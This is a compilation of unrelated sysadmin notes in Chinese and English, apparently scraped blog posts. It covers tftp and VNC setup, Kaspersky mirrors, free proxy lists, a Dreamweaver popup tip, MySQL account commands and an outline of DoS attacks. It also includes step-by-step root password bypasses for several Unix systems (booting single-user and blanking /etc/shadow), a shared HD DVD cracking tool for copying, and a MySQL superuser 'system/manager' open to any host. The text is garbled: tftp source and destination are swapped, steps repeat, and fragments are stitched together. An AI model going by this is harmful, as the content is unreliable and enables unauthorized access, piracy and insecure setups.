指定本地或远程计算机。

put

将本地计算机上的文件 destination 传送到远程计算机上的文件 source。

get

将远程计算机上的文件 destination 传送到本地计算机上的文件 source。

如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one,请指定 put。如果将远程计算机上的文件file-two 传送到远程计算机上的文件 file-one,请指定 get。

因为 tftp 协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。

source

指定要传送的文件。如果本地文件指定为 -,则远程文件在 stdout 上打印出来(如果获取),或从 stdin(如果放置)读取。

destination

指定将文件传送到的位置。如果省略了 destination,将假定与 source 同名。

指定特定用户登录VNC:


The VNC server can be automatically started when the system boots via the vncserver service. However, before this service will work, some preparatory set up needs to be done.

First, edit the /etc/sysconfig/vncservers file to include the users you want to run VNC servers for. Add a line to that file as follows:

VNCSERVERS="N:user"

Where N is the number of the display you want the VNC server to run on and user is the username you want the server to run as. Multiple displays and users can be specified by placing a space between them, as follows:

VNCSERVERS="N:user1 Y:user2"

Note that if you are using the X Window System, display 0 cannot be used for VNC as it is already being used by X.

For each user you specify, a VNC password needs to be set. VNC passwords are completely separate from the normal system password for that account. A user can set their VNC password by executing the vncpasswd command. For example:

$ vncpasswd
Password:
Verify:

By default, VNC starts up only a simple window manager and a terminal window. If you would like to have the full Red Hat environment, create ~username/.vnc/xstartup and include the following lines:

#!/bin/bash
unset SESSION_MANAGER
exec /etc/X11/xinit/xinitrc

Lastly, ensure that the resulting file has the execute bit set:

# chmod 755 ~username/.vnc/xstartup

In order to start the vncserver service immediately, run the following command:

# service vncserver start

For exmaple:

# service vncserver start
Starting VNC server: 1:user1 

In order for the vncserver service to start during the boot sequence, run the following command:

# chkconfig vncserver on

Note this command will simply return a command prompt. For example:

# chkconfig vncserver on
# chkconfig --list vncserver
vncserver       0:off   1:off   2:on    3:on    4:on    5:on    6:off

启动VNC Server控制Native X Server:

If you configure VNC to control the native X server of a system, you can interact with the console while sitting at the system or from any other system that can run a VNC viewer program. Be sure to do this initial VNC implementation during a maintenance window for your server in case VNC does not work correctly with your video card.

Warning: The following solution is not graceful and should be tested throughly before utilizing it on a production system.

To set up VNC to control the native X server, follow these steps:

  1. On the system you want to control with VNC, run the program vncpasswd as root to set a VNC password. You will use this password when connecting with vncviewer or another VNC remote control program.
  2. Edit the file /etc/X11/XF86Config to include the following commands. The XF86Config file is divided into parts that begin with the word Section and end with the word EndSection. You will need to add the following lines to the indicated section, making sure they come before the EndSection tag for that particular section.

    Red Hat Enterprise Linux 4 and above uses the XOrg implementation instead of XFree86. Edit the file /etc/X11/xorg.conf instead of XF86Config

    In the section called Module, add this line:

    Load "vnc"

    Make sure this is on a new line before EndSection.

    In section called Screen, add this line:

    Option "passwordFile" "/root/.vnc/passwd"

    Make sure this is on a new line before EndSection.

After you have rebooted your machine, VNC will load automatically each time you enter runlevel 5 (graphical mode). If you do not want to reboot now, you can make the changes active by logging out of graphical mode and pressing Ctrl+Alt+Backspace to restart the X server.

Because you are connecting to the root console, you do not have to type a number after the machine name or IP address when connecting to this computer with a VNC viewer.


让VNC走SSH:

To tunnel VNC connections over SSH, you must have a real system account on the machine running the VNC server. You must also know what display the VNC server is running on (which can be found in the /etc/sysconfig/vncservers file). Once you have these pieces of information, connect to the VNC server with the following SSH command:

ssh -L 590X:127.0.0.1:590X -N -f -l username servername

Replace the X‘s with the display number the VNC server is running on. For example, if the VNC server was running on display 1, you would specify 5901.

In your VNC client, instead of connecting directly to the VNC server, connect to "127.0.0.1:590X", again replacing X with the appropriate display number. This will tunnel the connection over SSH, providing greatly enhanced security.

著名的HD DVD已被破解,据称Blue Ray DVD(蓝光DVD)使用的也是同样的算法,不久也会被破解出来。

这下可以把HD DVD拷贝到硬盘上看了,这是不是意味着HD/BlueRay DVD要开始流行了?呵呵

附件是好不容易找到的HD DVD的破解程序

 


 

Muslix64的俄罗斯黑客组织公开宣布,已经成功破译了高清晰DVD的保护代码,从而也为大规模盗版奠定了基础。

Muslix64破解程序发布原网页:http://forum.doom9.org/showthread.php?t=119871

 

附件:backuphddvd.zip(17964 Byte)

因为地震的原因,卡巴斯基无法更新了,用了好几个代理都无法解决,终于找到一个临时的解决办法.

在服务——更新——设置,添加另一个卡巴升级服务器http://dnl-eu8.kaspersky-labs.com 去掉“卡巴斯基实验室更新服务器”的对钩,然后局域网设置里面,使用自定义代理设置,这个代理网上有很多,cb里面也给出不少,大家自己试吧,另外超时连接时间最好设置久一点.

其他升级服务器(感谢匿名朋友提供)
http://dnl-eu5.kaspersky-labs.com
http://dnl-eu8.kaspersky-labs.com
http://dnl-eu9.kaspersky-labs.com

摘自:cnbeta


现在卡巴升级很困难,而现在了解的方法就是更改最加更新地区来更改服务器,其实还有一种方法,可以让你指定升级的具体服务器.服务器列表在updcfg.xml里面,但这里设置的中国是在美国和欧洲的服务器的,从卡巴网站下载的离线升级包里,发现 updcfg.xml里有中国的服务器,我们就来指定到这些为中国准备的服务器去升级(服务器还是在俄国吧,另外更改updcfg.xml不行,会自动更新掉).

服务器列表,大家可以自行选择认为比较快的服务器

服务器:http://ru1h.kaspersky-labs.com 国家:Russia
服务器:http://ru2h.kaspersky-labs.com 国家:Russia
服务器:http://ru3h.kaspersky-labs.com 国家:Russia
服务器:http://ru4h.kaspersky-labs.com 国家:Russia
服务器:http://ru5h.kaspersky-labs.com 国家:Russia
服务器:http://ru6h.kaspersky-labs.com 国家:Russia
服务器:http://ru7h.kaspersky-labs.com 国家:Russia
服务器:http://ru8h.kaspersky-labs.com 国家:Russia
服务器:ftp://ru1f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru2f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru3f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru4f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru5f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru6f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru7f.kaspersky-labs.com 国家:Russia
服务器:ftp://ru8f.kaspersky-labs.com 国家:Russia

服务器:http://eu1h.kaspersky-labs.com 国家:Europe
服务器:http://eu2h.kaspersky-labs.com 国家:Europe
服务器:http://eu3h.kaspersky-labs.com 国家:Europe
服务器:http://eu4h.kaspersky-labs.com 国家:Europe
服务器:http://eu5h.kaspersky-labs.com 国家:Europe
服务器:http://eu6h.kaspersky-labs.com 国家:Europe
服务器:ftp://eu1f.kaspersky-labs.com 国家:Europe
服务器:ftp://eu2f.kaspersky-labs.com 国家:Europe
服务器:ftp://eu3f.kaspersky-labs.com 国家:Europe
服务器:ftp://eu4f.kaspersky-labs.com 国家:Europe
服务器:ftp://eu5f.kaspersky-labs.com 国家:Europe
服务器:ftp://eu6f.kaspersky-labs.com 国家:Europe

服务器:http://us1h.kaspersky-labs.com 国家:America
服务器:http://us2h.kaspersky-labs.com 国家:America
服务器:http://us3h.kaspersky-labs.com 国家:America
服务器:http://us4h.kaspersky-labs.com 国家:America
服务器:http://us5h.kaspersky-labs.com 国家:America
服务器:http://us6h.kaspersky-labs.com 国家:America
服务器:ftp://us1f.kaspersky-labs.com 国家:America
服务器:ftp://us2f.kaspersky-labs.com 国家:America
服务器:ftp://us3f.kaspersky-labs.com 国家:America
服务器:ftp://us4f.kaspersky-labs.com 国家:America
服务器:ftp://us5f.kaspersky-labs.com 国家:America
服务器:ftp://us6f.kaspersky-labs.com 国家:America

服务器:http://cn1h.kaspersky-labs.com 国家:China
服务器:http://cn2h.kaspersky-labs.com 国家:China
服务器:http://cn3h.kaspersky-labs.com 国家:China
服务器:http://cn4h.kaspersky-labs.com 国家:China
服务器:http://cn5h.kaspersky-labs.com 国家:China
服务器:http://cn6h.kaspersky-labs.com 国家:China
服务器:ftp://cn1f.kaspersky-labs.com 国家:China
服务器:ftp://cn2f.kaspersky-labs.com 国家:China
服务器:ftp://cn3f.kaspersky-labs.com 国家:China
服务器:ftp://cn4f.kaspersky-labs.com 国家:China
服务器:ftp://cn5f.kaspersky-labs.com 国家:China
服务器:ftp://cn6f.kaspersky-labs.com 国家:China
服务器:http://jp1h.kaspersky-labs.com 国家:Japan
服务器:http://jp2h.kaspersky-labs.com 国家:Japan
服务器:http://jp3h.kaspersky-labs.com 国家:Japan
服务器:http://jp4h.kaspersky-labs.com 国家:Japan

服务器:http://kr1h.kaspersky-labs.com 国家:Korea
服务器:http://kr2h.kaspersky-labs.com 国家:Korea
服务器:http://kr3h.kaspersky-labs.com 国家:Korea
服务器:http://kr4h.kaspersky-labs.com 国家:Korea
服务器:http://kr5h.kaspersky-labs.com 国家:Korea
服务器:http://kr6h.kaspersky-labs.com 国家:Korea
服务器:ftp://kr1f.kaspersky-labs.com 国家:Korea
服务器:ftp://kr2f.kaspersky-labs.com 国家:Korea
服务器:ftp://kr3f.kaspersky-labs.com 国家:Korea
服务器:ftp://kr4f.kaspersky-labs.com 国家:Korea
服务器:ftp://kr5f.kaspersky-labs.com 国家:Korea
服务器:ftp://kr6f.kaspersky-labs.com 国家:Korea

服务器:http://dnl-ru1.kaspersky-labs.com 国家:am,az,by,ge,kg,kz,md,ru,tj,tm,ua,uz
服务器:ftp://dnl-ru1.kaspersky-labs.com 国家:am,az,by,ge,kg,kz,md,ru,tj,tm,ua,uz
服务器:http://dnl-ru2.kaspersky-labs.com 国家:am,az,by,ge,kg,kz,md,ru,tj,tm,ua,uz
服务器:ftp://dnl-ru2.kaspersky-labs.com 国家:am,az,by,ge,kg,kz,md,ru,tj,tm,ua,uz
服务器:http://dnl-ru5.kaspersky-labs.com 国家:am,az,by,ge,kg,kz,md,ru,tj,tm,ua,uz
服务器:ftp://dnl-ru5.kaspersky-labs.com 国家:am,az,by,ge,kg,kz,md,ru,tj,tm,ua,uz

服务器:http://dnl-eu1.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:ftp://dnl-eu1.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:http://dnl-eu2.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:ftp://dnl-eu2.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:http://dnl-eu3.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:ftp://dnl-eu3.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:http://dnl-eu4.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:ftp://dnl-eu4.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu
服务器:http://dnl-eu5.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt
服务器:ftp://dnl-eu5.kaspersky-labs.com 国家:fr,de,pl,es,tr,it,ro,gb,uk,at,nl,be,lt,cs,lv,bg,ee,cz,gr,hu

服务器:http://dnl-us3.kaspersky-labs.com 国家:us,ca,mx,ar,br,cl,cn,tw,hk,th
服务器:ftp://dnl-us3.kaspersky-labs.com 国家:us,ca,mx,ar,br,cl,cn,tw,hk,th

服务器:http://dnl-jp1.kaspersky-labs.com 国家:jp
服务器:http://dnl-jp2.kaspersky-labs.com 国家:jp
服务器:http://dnl-jp3.kaspersky-labs.com 国家:jp
服务器:http://dnl-jp4.kaspersky-labs.com 国家:jp

服务器:http://dnl-kr1.kaspersky-labs.com 国家:kr
服务器:ftp://dnl-kr1.kaspersky-labs.com 国家:kr

服务器:http://dnl-eu1.kaspersky-labs.com 国家:*
服务器:ftp://dnl-eu1.kaspersky-labs.com 国家:*
服务器:http://dnl-eu2.kaspersky-labs.com 国家:*
服务器:ftp://dnl-eu2.kaspersky-labs.com 国家:*
服务器:http://dnl-eu3.kaspersky-labs.com 国家:*
服务器:ftp://dnl-eu3.kaspersky-labs.com 国家:*
服务器:http://dnl-eu4.kaspersky-labs.com 国家:*
服务器:ftp://dnl-eu4.kaspersky-labs.com 国家:*
服务器:http://dnl-eu5.kaspersky-labs.com 国家:*
服务器:ftp://dnl-eu5.kaspersky-labs.com 国家:*
服务器:http://dnl-us3.kaspersky-labs.com 国家:*
服务器:ftp://dnl-us3.kaspersky-labs.com 国家:*
服务器:http://dnl-ru1.kaspersky-labs.com 国家:*
服务器:ftp://dnl-ru1.kaspersky-labs.com 国家:*
服务器:http://dnl-ru2.kaspersky-labs.com 国家:*
服务器:ftp://dnl-ru2.kaspersky-labs.com 国家:*
服务器:http://dnl-ru5.kaspersky-labs.com 国家:*
服务器:ftp://dnl-ru5.kaspersky-labs.com 国家:*

  建于对美海底光缆故障,我们就必须想办法绕过这个故障点。用什么办法呢?当然是代理啦!

免费Socks4 Socks5 代理服务器:

casper.gimasystem.jp:8080
cache-mex-roma-2.uninet.net.mx:8080
66.11.50.72:80
66.11.50.71:80
66.11.50.66:80
z95l171.static.ctm.net:8080
203.115.1.135:80
cache9-0.jed.isu.net.sa:80
cache8-0.jed.isu.net.sa:8080
cache8-0.jed.isu.net.sa:8000
cache8-0.jed.isu.net.sa:80
cache7-0.jed.isu.net.sa:8080
cache7-0.jed.isu.net.sa:80
cache6-0.jed.isu.net.sa:80
cache4-0.jed.isu.net.sa:80
cache3-0.jed.isu.net.sa:8000
cache2-0.jed.isu.net.sa:8000
cache2-0.jed.isu.net.sa:80
cache1-0.jed.isu.net.sa:8000
cache1-0.jed.isu.net.sa:80
cache-mex-roma-2.uninet.net.mx:80
66.11.54.66:80
222.231.50.97:80
148.233.159.24:80
148.233.159.24:3128
195.175.37.8:80
213.4.59.70:8080
tdev223-99.codetel.net.do:80
cache-mex-roma-2.uninet.net.mx:3128
sesiones.uninet.net.mx:80

130.88.203.26:3128 elite proxy United Kingdom (I2, Manchester)
130.88.203.27:3128 CoDeeN Network United Kingdom (I2, Manchester)
81.86.37.27:8080 elite proxy United Kingdom (K2, Oxford)
81.86.37.27:80 elite proxy United Kingdom (K2, Oxford)
80.177.238.45:8080 anonymous United Kingdom (P5, London)
83.105.34.104:8080 elite proxy United Kingdom (P5, London)
138.251.214.18:3128 CoDeeN Network United Kingdom
138.251.214.19:3128 CoDeeN Network United Kingdom
206.207.248.34:3128 CoDeeN Network United States (AZ, Tucson)
206.207.248.35:3128 CoDeeN Network United States (AZ, Tucson)
206.207.248.35:8888 elite proxy United States (AZ, Tucson)
199.77.128.194:3128 CoDeeN Network United States (CA, Alameda)
169.229.50.10:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.11:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.12:3128 CoDeeN Network United States (CA, Berkeley)

Free Proxy List, S O C K S Lists. SSL support, anonymous, hight anonymous with countries and organizations. Nntime.com Visit Us!

169.229.50.13:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.14:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.15:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.16:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.17:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.3:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.4:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.5:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.6:3128 elite proxy United States (CA, Berkeley)
169.229.50.8:3128 CoDeeN Network United States (CA, Berkeley)
169.229.50.9:3128 CoDeeN Network United States (CA, Berkeley)
69.50.161.179:80 elite proxy United States (CA, Concord)
128.195.25.100:3128 CoDeeN Network United States (CA, Irvine)
132.239.17.225:3128 CoDeeN Network United States (CA, La Jolla)
132.239.17.226:3128 CoDeeN Network United States (CA, La Jolla)

NSICC Team

设计页面时,经常会从一个页面打开一个子窗口以供浏览者查看。通常,这种子窗口中的内容一经浏览者看过,对于浏览者而言就不再需要,而他们常常会忘记关掉这些小窗口,致使许多的浏览器窗口打开着,耗用大量的资源。因此我们可以将子窗口设计成经过一段时间后可以自动关闭的形式。

  本例中制作了两个页面, Index.html是显示于子窗口中的页面,而在名为firstpage.html的页面中,包含在子窗口中打开Index.html的链接。单击链接时,将在子窗口中打开index.html。可以直接单击子窗口中的“关闭”链接关闭子窗口,也可以不去理睬它,在15秒之后,子窗口也会自动关闭。

  具体操作如下:

  1. 在本地站点中生成一个Sample文件夹。

  2. 在Smlple文件夹中,生成名为Index.html以及名为firstpage.html的文件。

  3. 双击Index.html,打开该文档,进入到文档的设计视图窗口中。

  4. 单击菜单View/Head Content,显示文档的头部区域。

  5. 单击设计视图窗口中的文档头部窗格。选择菜单Insert/Invisible Tags/Script,打开Inset Script对话框。在Language下拉列表框中选择JavaScript选项,并在Coctento文本框中输入“setTimeout("self.close()",15000)”。单击OK按钮,完成在文档头部插入15秒后自动关闭子窗口的脚本。在代码中,15000表示15000毫秒,也即15秒,也可以根据需要将之修改为自己需要的时间毫秒数。

  6. 在文档窗口中输入“关闭”字样,在属性面板上的Link文本框中输入“###”,将其设置为一个空链接。

  7. 在状态栏左端的快速标记编辑器上,单击标记按钮。选中“关闭”链接,然后按下Ctrl+T组合键,打开快速标记编辑器,进入到快速标记编辑器的编辑标记模式。然后在“>”前输入“onclick="selfclose()"”。 如图3所示,设置完毕,单击OK按钮,确认操作。这样在Index.html被作为子窗口打开后,单击该链接就可以立刻关闭该子窗口。

  8. 保存Index.html文件,并退出index.html的Dremweaver窗口。

  9. 现在开始设计fristpage.html页面。在本地站点的Smlple文件夹中,双击 fristpage.html,打开该文档,进入到文档的设计视图窗口中。

  10. 在文档中输入“单击这里打开会自动关闭的子窗口”字样。然后在属性面板上的 Link文本框中输入“###”,将之设置为空链接。

  11. 可以通过为该链接应用Open Browser Window行为来设置单击链接时打开Index.html窗口,不过更方便的方法是利用快速标识编辑器。方法是首先将插入点放置到链接中,然后在状态栏左端的标识选择器上,单击标识按钮,选中整个链接。然后按下Ctrl+T组合键,打开快速标记编辑器,进入到快速标记编辑器的 编辑标识模式。再在“>”前输入“onclick="window.open( index.html ,null , width=200px,height=200px )"”示)。设置完毕,按下回车键,确认操作。

  12.上述操作就完成了本例的设置。可以单击菜单用File/save,保存所做的工作。然后按下F12键,在浏览器中预览页面效果。

  一.freebsd

  FreeBSD 4.7

  当显示 boot … 9 seconds按任意健

  输入:boot -s

  登录以后

  #/sbin/mount -a

  #passwd

  输入新密码.

  FreeBSD 5.*

  当要求选择启动模式时按4进入单用户模式登录以后

  #/sbin/mount -a

  #passwd

  输入新密码.

  二.solaris

  ROOT密码遗忘的处理方法

  1,如果还能用普通用户登陆的话,%df /etc,确定包含/etc目录分区的设备名

  %df /etc

  / /dev/dsk/c0t0d0s0…

  此例中是c0t0d0s0,如果你的根目录分区设备不一样的话,替换一下就可以啦

  2,把系统盘插入cdrom中

  3,出现提示符后,使用sync命令刷新文件系统

  4,按下stop+A

  5,ok状态下键入boot cdrom -s

  6,在#提示符下键入mkdir /temp ,然后键入mount /dev/dsk/c0t0d0s0 /temp

  如果出现挂接不上的情况时,那么就运行fsck先 fsck /dev/rdsk/c0t0d0s0,然后在mount

  7,cd /temp/etc

  8,cp shadow shadowbak

  9,cat shadow

  得到root的口令字符串

  root:djglcj0J:6453::::(其中djglcj0J就是root的加密后的口令字符串)

  10,sed s/djglcj0J// shadow>shadownew

  11,cat shadownew查看是否已经变为

  root::6453::::

  12,cp shadownew shadow

  13,cd /

  unmount /temp

  sync

  shutdown -i0 -g0 -y

  3,出现提示符后,使用sync命令刷新文件系统

  4,按下stop+A

  5,ok状态下键入boot cdrom -s

  6,在#提示符下键入mkdir /temp ,然后键入mount /dev/dsk/c0t0d0s0 /temp

  如果出现挂接不上的情况时,那么就运行fsck先 fsck /dev/rdsk/c0t0d0s0,然后在mount

  7,cd /temp/etc

  8,cp shadow shadowbak

  9,cat shadow

  得到root的口令字符串

  root:djglcj0J:6453::::(其中djglcj0J就是root的加密后的口令字符串)

  10,sed s/djglcj0J// shadow>shadownew

  11,cat shadownew查看是否已经变为

  root::6453::::

  12,cp shadownew shadow

  13,cd /

  unmount /temp

  sync

  shutdown -i0 -g0 -y

  14,取出CD后,重起系统,这时root就不需要密码啦!

  这样也可以!

  OK boot cdrom -s

  #TERM=sun

  #export TERM

  #mount /dev/dsk/c0t0d0s0 /a

  #vi /a/etc/shadow(删除root的加密后的密码)

  #reboot

  三.SCO UNIX

  一旦运行SCO UNIX 机器的超级用户口令忘了,可以用这个方法解决。

  在另一台安装了SCO UNIX的机器上,以Root用户注册,进入系统,用 mkdev fd命令或命令scoadmin中的Filesystem之Floppy Filesystem Manager来制作应急启动盘,包括Boottable 盘和Root filesystem盘。

  将上述制作的Root filesystem盘安装到硬盘上。

  # mount /dev/fd0135ds18 /mnt

  再将硬盘上的/etc/passwd 和/tcb/files/auth/r/root两个文件拷贝到Root filesystem盘上。

  # cp /etc/passwd /mnt

  # cp /tcb/files/auth/r/root /mnt

  卸载机器1硬盘上的软盘。

  # umount /dev/rfd0135ds18

  用Boot软盘去启动遗忘口令的机器,根据提示插入Root filesystem软盘,待出现“#”时,进行下面操作,将硬盘挂到软盘上:

  # mount /dev/hd0root /mnt

  备份硬盘上的/etc/passwd和/tcb/files/auth/r/root两个文件。因为这两个文件中还包含其他用户的注册信息。

  用Root filesystem软盘上的两个文件,覆盖硬盘上的两个文件/etc/passwd 和/tcb/files/auth/r/root。

  # mkdir /cyh

  # mount /dev/fd0135ds18 /cyh

  # cd /cyh

  # cp passwd /mnt/etc

  # cp root /mnt/tcb/files/auth

  卸载安装上的两个文件系统。

  # umount /dev/hd0root

  # umount /dev/fd0135ds18

  取出软盘,重新启动机器,待出现Login时,以Root用户注册,键入第二台机器的超级用户口令,这样便可进入的超级用户了。

  进入超级用户后,用Passwd和Root这两个文件的备份覆盖原来的文件,接着用passwd命令修改超级用户的口令。

  用户可以用Alt+F2换一个窗口,以Root注册,现在用修改后的口令就能用了。

  四.aix4.3.3(ibm) rs/6000

  将第一张安装盘放入光驱,重起机器,按f5键,终端按5,进入maintance页面,选择mount rootvg的功能选项,调用password修改口令,退出即可

  五.linux

  三种办法:

  1.在系统进入单用户状态,直接用passwd root去更改

  2.用安装光盘引导系统,进行linux rescue状态,将原来/分区挂接上来,作法如下:

  cd /mnt

  mkdir hd

  mount -t auto /dev/hdaX(原来/分区所在的分区号) hd

  cd hd

  chroot ./

  passwd root

  这样可以搞定

  3.将本机的硬盘拿下来,挂到其他的linux系统上,采用的办法与第二种相同

  6.redhat 8 redhat9

  (1). lilo法

  1. 在出现 lilo: 提示时键入 linux single

  画面显示 lilo: linux single

  2. 回车可直接进入linux命令行

  3. #vi /etc/shadow

  将第一行,即以root开头的一行中root:后和下一个:前的内容删除,

  第一行将类似于

  root::……

  保存

  4. #reboot重启,root密码为空

  (2). grub法

  1. 在出现grub画面时,用上下键选中你平时启动linux的那一项(别选dos哟),然后按e键

  2. 再次用上下键选中你平时启动linux的那一项(类似于kernel /boot/vmlinuz-2.4.18-14 ro root=LABEL=/),然后按e键

  3. 修改你现在见到的命令行,加入single,结果如下:

  kernel /boot/vmlinuz-2.4.18-14 single ro root=LABEL=/

  4. 回车返回,然后按b键启动,即可直接进入linux命令行

  5. #vi /etc/shadow

  将第一行,即以root开头的一行中root:后和下一个:前的内容删除,

  第一行将类似于

  root::……

  保存

  6. #reboot重启,root密码为空

  7.HP-UX

  启动时按esc 进入isl

  进入ISL后:

  isl>bo pri

  (yes/no)y

  ipl>hpux -is

  ipl>vi /etc/passwd

  去掉root 的密码即可。

MySQL是一个真正的多用户、多线程SQL数据库服务器。MySQL是以一个客户机/服务器结构的实现,它由一个服务器守护程序mysqld和很多不同的客户程序和库组成。由于其源码的开放性及稳定性,且与网站流行编徎语言PHP的完美结合,现在很多站点都利用其当作后端数据库,使其获得了广泛应用。处于安全方面的考虑,需要为每一用户赋于对不同数据库的访问限制,以满足不同用户的要求。下面就分别讨论,供大家参考。

一、MySQL修改密码方法总结

首先要说明一点的是:一般情况下,修改MySQL密码是需要有mysql里的root权限的,这样一般用户是无法更改密码的,除非请求管理员帮助修改。

方法一

使用phpMyAdmin (图形化管理MySql数据库的工具),这是最简单的,直接用SQL语句修改mysql数据库库的user表,不过别忘了使用PASSWORD函数,插入用户用Insert命令,修改用户用Update命令,删除用Delete命令。在本节后面有数据表user字段的详细介绍。

方法二

使用mysqladmin。输入:

mysqladmin -u root -p oldpassword newpasswd

执行这个命令后,需要输入root的原密码,这样root的密码将改为newpasswd。同样,把命令里的root改为你的用户名,你就可以改你自己的密码了。 当然如果你的mysqladmin连接不上mysql server,或者你没有办法执行mysqladmin,那么这种方法就是无效的,而且mysqladmin无法把密码清空。

下面的方法都在mysql提示符下使用,且必须有mysql的root权限:

方法三

 

mysql"gt; INSERT INTO mysql.user (Host,User,Password)
 valueS (‘%‘,‘system‘, PASSWORD(‘manager‘)); 
mysql"gt; FLUSH PRIVILEGES

确切地说这是在增加一个用户,用户名为system,密码为manager。注意要使用PASSWORD函数,然后还要使用FLUSH PRIVILEGES来执行确认。

方法四

和方法三一样,只是使用了REPLACE语句

 

mysql"gt; REPLACE INTO mysql.user (Host,User,Password) 
valueS(‘%‘,‘system‘,PASSWORD(‘manager‘)); 
mysql"gt; FLUSH PRIVILEGES

方法五

使用SET PASSWORD语句

 

mysql"gt; SET PASSWORD FOR system@"quot;%"quot; = PASSWORD(‘manager‘);

你也必须使用PASSWORD()函数,但是不需要使用FLUSH PRIVILEGES来执行确认。

方法六

使用GRANT … IDENTIFIED BY语句,来进行授权。

 

mysql"gt; GRANT USAGE ON *.* TO system@"quot;%"quot; IDENTIFIED BY ‘manager‘;

这里PASSWORD()函数是不必要的,也不需要使用FLUSH PRIVILEGES来执行确认。

注:PASSWORD()函数作用是为口令字加密,在程序中MySql自动解释。

二、MySql中访问限制的设置方法

我们采用两种方法来设置用户。进入到Mysql执行目录下(通常是c:mysqlin)。输入mysqld-shareware.exe,输入mysql –user=root mysql ,不然不能添加新用户。进入到mysql"gt;提示符下进行操作。假设我们要建立一个超级用户,用户名为system,用户口令为manager。

方法一

用Grant 命令授权,输入的代码如下:

 

mysql"gt;GRANT ALL PRIVILEGES ON *.* TO system@localhost 
IDENTIFIED BY ‘manager‘ WITH GRANT OPTION;

应显示:Query OK, 0 rows affected (0.38 sec)

方法二

对用户的每一项权限进行设置:

 

mysql"gt;INSERT INTO user valueS(‘localhost‘,‘system‘,
PASSWORD(‘manager‘), ‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘,‘Y‘);

对于3.22.34版本的MySQL,这里共14个"quot;Y"quot;,其相应的权限如下(按字段顺序排列): 权限 表列名称 相应解释 使用范围

select Select_priv 只有在真正从一个表中检索时才需要select权限 表

insert Insert_priv 允许您把新行插入到一个存在的表中 表

update Update_priv 允许你用新值更新现存表中行的列 表

delete Delete_priv 允许你删除满足条件的行 表

create Create_priv 允许你创建新的数据库和表 数据库、表或索引

drop Drop_priv 抛弃(删除)现存的数据库和表 数据库或表

reload Reload_priv 允许您告诉服务器再读入授权表 服务器管理

shutdown Shutdown_priv 可能被滥用(通过终止服务器拒绝为其他用户服务) 服务器管理

process Process_priv 允许您察看当前执行的查询的普通文本,包括设定或改变口令查询 服务器管理

file File_priv 权限可以被滥用在服务器上读取任何可读的文件到数据库表 服务器上的文件存取

grant Grant_priv 允许你把你自己拥有的那些权限授给其他的用户 数据库或表

references References_priv 允许你打开和关闭记录文件 数据库或表

index Index_priv 允许你创建或抛弃(删除)索引 表

alter Alter_priv 允许您改变表格,可以用于通过重新命名表来**权限系统 表

如果创建用户时只有select、insert、update和delete权限,则允许用户只能在一个数据库现有的表上实施操作。

下面就可以创建我们要用到的数据库了,我们直接输入. 例如:我们要创建数据库名为XinXiKu,可用如下代码:

mysql"gt;create database XinXiKu;

应显示:Query OK, 1 row affected (0.00 sec)

    1、服务拒绝攻击

    服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务,服务拒绝攻击是最容易实施的攻击行为,主要包括:

    死亡之ping (ping of death)

    概览:由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产生畸形的,声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方当机。

    防御:现在所有的标准TCP/IP实现都已实现对付超大尺寸的包,并且大多数防火墙能够自动过滤这些攻击,包括:从windows98之后的windows,NT(service pack 3之后),linux、Solaris、和Mac OS都具有抵抗一般ping ofdeath攻击的能力。此外,对防火墙进行配置,阻断ICMP以及任何未知协议,都讲防止此类攻击。

    泪滴(teardrop)

    概览:泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指示该分段所包含的是原包的哪一段的信息,某些TCP/IP(包括servicepack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。

    防御:服务器应用最新的服务包,或者在设置防火墙时对分段进行重组,而不是转发它们。

    UDP洪水(UDP flood)

